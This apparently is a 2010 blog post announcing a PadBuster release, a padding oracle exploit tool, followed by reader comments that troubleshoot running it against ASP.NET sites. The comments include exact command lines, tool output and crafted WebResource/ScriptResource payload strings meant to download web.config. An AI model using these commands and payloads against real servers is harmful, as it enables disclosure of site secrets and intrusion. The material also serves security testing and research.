Search
Twitter
« PadBuster v0.3 and the .NET Padding Oracle Attack | Main | Automated Padding Oracle Attacks with PadBuster »
Tuesday
Sep282010

New Version of PadBuster Available for Download

A few weeks ago we released PadBuster, a tool for automating padding oracle exploits. Today we have released version 0.2, which includes some bug fixes and a few enhancements that are summarized below:

  • Support for HTTP Basic Authentication and HTTP/S Proxies
  • Encoding for .NET UrlTokens (essentially a web-safe Base64 encoding)
  • Logic for handling samples that do not include an IV (or use a NULL IV)

The .NET UrlToken encoding and NULL IV options are both especially useful when running PadBuster against sites that are vulnerable to the recent .NET Padding Oracle attack. There are also new options for running the tool in interactive mode (good for troubleshooting) and resuming a previous decryption in the event that the script gets killed in the middle of decrypting a large sample.

As with the previous version, feel free to provide feedback on potential improvements you would like to see. Version 0.3 is already in the works and promises to have more cool features.

Reader Comments (42)

That's great! Testing it right now and it is working like a charm. Testing to decrypt the ASP.Net viewstate with enableViewStateMac option on, custom errors set to off.
Thanks a lot.

September 28, 2010 | Unregistered CommenterAlex

I've modified 0.1 to work without iv, however get stuck because I thought iv would be anithing but null :)

thanks for sharing, this code allows to clearly see why and how exactly particular application are vulnerable.

September 29, 2010 | Unregistered CommenterAlexander

How to use this against .NET apps? I always get the usage screen. I tested my website and I get different responses for "http://www.mysite.com/notexistentpage.aspx" vs the response to "http://www.mysite.com/WebResource.axd?d=wrongstring". I also opened the source code of my index.aspx and I found /WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001"

Tested it in different ways and I never get it working.

I was trying like this ./padBuster.pl "http://www.mysite.com/WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001" 16

In this case what is the [EncryptedSample]? Can you give me a example?

Also, what is the correct way to send a request? I mean, suppose I want to download web.config I should send something like "q|~/web.config", right?

September 30, 2010 | Unregistered CommenterAlfred

after testing for .net app using -plaintext "q|~/myhiddenfile.txt" the enrcypted result is "=�� � `z��f�x��q|~/myhiddenfile.txt"
which is prevents me from downloading myhiddenfile.txt
I think .net IV is always /x00 and not depending on the previous block.

September 30, 2010 | Unregistered Commenterfreesrvs

i mean .Net do not want IV from the request and its always null /x00/.
so the encrypted result must not include the IV value

September 30, 2010 | Unregistered Commenterfreesrvs

Thanks for the script.

I've been testing this against an ASP.NET app using 16 byte (AES) encryption and the script always fails to find byte 2. I'm running it with the -noiv and -encoding=3 options and trying to decrypt a WebResource.axd cipher. Any ideas?

September 30, 2010 | Unregistered CommenterNatan Yellin

@Alfred: The reason you are getting the usage screen is that you are missing a required command line argument (the encrypted sample). The encrypted sample is the encrypted value that must also be present in the Query String, Post Data, or Cookie values. So for the scenario you outlined, your command line should be as follows:


./padBuster.pl “http://www.mysite.com/WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001″ PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa 16

Note that the encrypted string is passed to PadBuster twice (once as part of the query string and once as part of the sample).

@freesrvs: Yes, you are correct. The encrypted payload that PadBuster generates is preceded by another block (the IV), which needs to be XORed against the intermediate value produced by the last block to generate your desired value. Exploiting ScriptResource to download an arbitrary file is not as simple as generating the payload and passing it as the parameter (for the exact reason you mention…the Framework does not use an IV on the first block). There are some workarounds that Rizzo and Duong mention in their original paper for dealing with this scenario.

@Natan: This is a known issue. The problem is that you are likely running against a server that has Custom Errors enabled. What’s happening here is that WebResource.axd normally takes a payload that looks similar to the following:

s|WebForms.js

The above string represents the resource type (s) followed by the resource name (WebForms.js) and delimited with a pipe character (|). When you pass an invalid resource name, the handler throws a 404 response:

404: [HttpException]: Resource not found in assembly

This happens as you work backwards through the block manipulating each byte, which allows PadBuster to determine when the Padding Error (a 500 error) goes away. At least that's what happens until you get to byte #2. Note that this byte is the pipe character, which is a required delimiter. If this delimiter is not present, the handler throws a 500 response:

500: [HttpException]: This is an invalid webresource request

Unfortunately when custom errors are enabled, all 500 errors look identical...so PadBuster is unable to tell the difference between this error and the Padding Exception which occurs on the other 255 requests.

The good news however, is that there is a pretty simple workaround. If you re-run the same command but also use the –prefix option to pass the HEX encoded equivalent of your un-altered encrypted string, PadBuster will always pass this unaltered block as the first block of each request so you’ll be able to decrypt the string with no problem. So for example, the string M48vAB4P7iimjh7inLsvYg2 (NetUrlToken Encoded) should be converted to ASCII HEX Encoding (338F2F001E0FEE28A68E1EE29CBB2F62) and passed as the -prefix option (keep the rest of your command the same). Try this out and it should work.

September 30, 2010 | Unregistered CommenterBrian Holyfield

@Brian thanks for the fast answer, very helpful. I tried it, but always get this reponse "ERROR: Encrypted Bytes must be evenly divisible by Block Size (16). Double check the Encoding and Block Size." One thing that called my attention is that value passed to argument "d" that we should use as encrypted sample is 44 characters long which is not divided by 18 or 8. I also noted that all values passed do "d" in my servers end with "amp;". On my previous post I have replaced my values to protect myself, but now I will send the reals to see if it happens in identify the issue, opening my website on the browser and asking to see the source of index.aspx I have:

"/WebResource.axd?d=0X4s9hj32wTEa6qrkDU3nA2&t=634192562657570720" type="text

/ScriptResource.axd?d=N950sRNXiREcgmBGy7n3U6jYnPpMDE-EHlj61ni1bngnmy4kzdAn2YAIooXYJqXO_TGhV9YLO47obLJkjI2tB8_PNi8SUo0BSPSz7-ijmcY1&t=ffffffffe355792b" type="text

This helps? Also, we should not use encoding 3=.NET UrlToken since it's a .NET application?

I tried with 8 -encoding 3 and 16 -encoding 3 and I always get:

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 500 3026 N/A
-------------------------------------------------------

ERROR: All of the responses were identical.

Double check the Block Size and try again.

Which is not true, if I request https://www.mysite.com/noexistent.aspx I get "Server Error in '/' Application.

The resource cannot be found.

Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.

Requested URL: /noexistent.aspx". While requesting http://www.mysite.com/WebResource.axd?d=test returns: "Server Error in '/' Application.

Runtime Error

Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a tag within a "web.config" configuration file located in the root directory of the current web application. This tag should then have its "mode" attribute set to "Off".



Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's configuration tag to point to a custom error page URL.




"

Any idea what is my problem?

Thanks

October 1, 2010 | Unregistered CommenterAlfred

@Alfred: Make sure you are using "-encoding 3" and "-noiv" options. If you still have problems send an email to [email protected] so I can troubleshoot the problem with you on a private thread. We can post the solution back here if it makes sense afterwards.

October 1, 2010 | Unregistered CommenterBrian Holyfield

I'm having same problems, just like Alfred.

October 1, 2010 | Unregistered Commentern1

@freesrvs: Actually there are several ways to download the Web.config.

One is to use as a first block a block that starts with "R" after decription.
In this example: "Rlksdjh88098788|~/web.config" R followed by garbage is valid and lead to file access.

This thing works because the string is processed as a NameValue collection Type and is checked the first byte to get the resource to download. E.g. str[0] = "R".

Actually I'm testing some more efficient methods, I'll keep you updated.

October 1, 2010 | Unregistered CommenterGiorgio Fedon

I have to be more precise on the above post.

Valid request exploit with garbage is the following one:

"r#jduejgarbageloajhjksj|||~/web.config"

October 1, 2010 | Unregistered CommenterGiorgio Fedon

If you do not want to bruteforce, the other interesting exploit is that if you have framework 3.5 sp1, there are maybe different resources that are accessed via the "q|~/img/document.js" method.

In this way you can use an existing encrypted block and adding resources with a comma:

"q|~/img/document.js,~/Web.config"

The response will hold both files

October 1, 2010 | Unregistered CommenterGiorgio Fedon

Next, last, but not least you can issue multiple requests.

"q|~/img/document.js|#|||~/web.config"

Maybe this is the most useful, because you can get rid of some flags. Note that all must be valid resources for this to work.

October 1, 2010 | Unregistered CommenterGiorgio Fedon

nice Giorgio, you doing a great job, MS you must think more and more to secure people data.

October 1, 2010 | Unregistered Commenterfreesrvs

@Brian thanks for the answer, it helped in someway. However, it never complete, I always get a output like this:

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21547

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 1510 N/A
2 ** 255 500 3026 N/A
-------------------------------------------------------

Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (110) [Byte 16]
[+] Success: (107) [Byte 15]
[+] Success: (119) [Byte 14]
[+] Success: (101) [Byte 13]
[+] Success: (97) [Byte 12]
[+] Success: (111) [Byte 11]
[+] Success: (107) [Byte 10]
[+] Success: (105) [Byte 9]
[+] Success: (95) [Byte 8]
[+] Success: (67) [Byte 7]
[+] Success: (94) [Byte 6]
[+] Success: (110) [Byte 5]
[+] Success: (104) [Byte 4]
[+] Success: (89) [Byte 3]
ERROR: No matching response on [Byte 2]
Do you want to start this block over? (Yes/No)? [y/n/a] : y
INFO: Switching to interactive mode
[+] Success: (110) [Byte 16]
Do you want to use this value (Yes/No/All)? [y/n/a] : a
[+] Success: (107) [Byte 15]
[+] Success: (119) [Byte 14]
[+] Success: (101) [Byte 13]
[+] Success: (97) [Byte 12]
[+] Success: (111) [Byte 11]
[+] Success: (107) [Byte 10]
[+] Success: (105) [Byte 9]
[+] Success: (95) [Byte 8]
[+] Success: (67) [Byte 7]
[+] Success: (94) [Byte 6]
[+] Success: (110) [Byte 5]
[+] Success: (104) [Byte 4]
[+] Success: (89) [Byte 3]
ERROR: No matching response on [Byte 2]
Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode
[+] Success: (110) [Byte 16]

And it keeps on this infinite loop. Is it a well known problem?

Thanks

October 1, 2010 | Unregistered CommenterAlfred

@Giorgio Fedon interesting. Can you please give a example to download web.config with padBuster? I mean, how I should pass the parameter “r#jduejgarbageloajhjksj|||~/web.config”? Also, on the case “q|~/img/document.js,~/Web.config” I believe that this /img/document.js is not a default file, right? We can replace it by any file? Even for example a .aspx to read the source code?

I got curious, is possible to download files (web.config) even with .NET framework 2.x? I see a few people telling it's not possible.

Thanks

October 1, 2010 | Unregistered CommenterAlfred

still give garbage :(

����Û:����0auKq|~/mysenesitvefile.js|#|||~/web.config

this prevent downloading any file of them.

October 1, 2010 | Unregistered Commenterfreesrvs

@Alfred: You are having the exact same issue that @Natan asked about above. Please see my response to him as this will solve your problem.

@freesrvs: There is an extra step required to get this exploit to work and the current version of PadBuster alone is NOT enough to get you there. Version 0.3 of PadBuster has a brute force option that will do exactly what @Georgio has suggested...which is how you can download the web.config. We intentionally omitted this feature from the current version as we felt it was too soon to release the only public full working exploit for file downloads. The good news is that we are planning to release this feature in the next version, which will be out soon.

October 1, 2010 | Unregistered CommenterBrian Holyfield

@Brian this MS patch (MS10-070) effectively solve the problem without any code change?

Also, I believe that everyone may be interested, a new version of POET was released, I believe it should allows to download files, etc. If someone has a 64 bit box and could test.

http://netifera.com/download/poet/poet-1.0.1-linux-x86_amd64.jar

Thanks

October 1, 2010 | Unregistered CommenterAlfred

I see a lot of people saying that Web.Config is only downloadable via ScriptResource.axd, that's true? I open my index.aspx and I can't find any reference to ScriptResource.axd. How can I find the encrytation sample for this resource?

Thanks for the nice forum and stuff.

October 1, 2010 | Unregistered CommenterAlfred

@Brian, I did what you suggested to Natan, I hex-encoded my encruption sample, calling in this way.

/padBuster.pl "http://www.mysite.com/WebResource.axd?d=LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1&t=634190276720650178" "LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1" 16 -encoding 3 -noiv -prefix "4c72457a6b6b49565276596765766b417531737344706e724a743745664668344f77646c63426a4763716731"

And now I have no more problems with [Byte 2], but instead I have with [Byte 14], or [Byte 16], ....

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21547

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 N/A
2 ** 255 500 3026 N/A
-------------------------------------------------------

Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended :
Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (140) [Byte 16]
[+] Success: (221) [Byte 15]
ERROR: No matching response on [Byte 14]
Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode

ERROR: No matching response on [Byte 16]
Do you want to start this block over? (Yes/No)? [y/n/a] : Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode
ERROR: No matching response on [Byte 16]
Do you want to start this block over? (Yes/No)? [y/n/a] :

Thanks

October 1, 2010 | Unregistered CommenterAlfred

@Alfred: You have the wrong prefix value. You need to decode the Base64 value before you HEX encode it (you HEX encoded the Base64 string).

So for a .NET URL Token of "LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1", the HEX encoded equivalent is 2EB13392421546F6207AF900BB5B2C0E99EB26DEC47C58783B07657018C672A8.

In hindsight, the encoding format used for the -prefix option should probably default to whatever encoding is specified with the -encoding switch to make this feature easier to use. I'll add that to the list of enhancements for v0.3.

As for your question related to the patch, the Microsoft patch for this issue *should* work without any code changes. I have not tested the patch so I cannot vouch for its effectiveness, but based on what I have read it does appear to correct the issue.

Finally, regarding the version 1.0.1 of POET, I have not run this version but my understanding is that it is just an updated build of the previous POET for certain 64-bit systems. Let me know if that is not the case. I believe you are correct that the web.config can only be downloaded via ScriptResource.axd as that is the only handler that I have been able to get the exploit working against. That being said, it is very possible that other file download vectors may exist...I just don't know for sure.

October 1, 2010 | Unregistered CommenterBrian Holyfield

@Giorgio Fedon can you explain more how to brute force?
how can I brute force till the required message is decrypted?

October 1, 2010 | Unregistered Commenterfreesrvs

@Brian, thanks for your help, it worked. I noted that in my 3 different webservers I always get the same final response from the tool "[+] Decrypted value (ASCII): s|WebUIValidation.js". If I don't have a dotNuke .Net installed and if there is no public exploit to download web.config, what hackers can does with it?

Even if there is a public exploit (I haven't tested the new version of POET because I don't have a 64 bits box, but the release number is version 1.1, different from all the others available on the author website) to download Web.Config and I have no DotNuke .Net, there is something that a hacker is able to do to compromise my servers?

Thanks

October 1, 2010 | Unregistered CommenterAlfred

PostPost a New Comment

Enter your information below to add a new comment.

My response is on my own website »
Author Email (optional):
Author URL (optional):
Post:
 
All HTML will be escaped. Hyperlinks will be created for URLs automatically.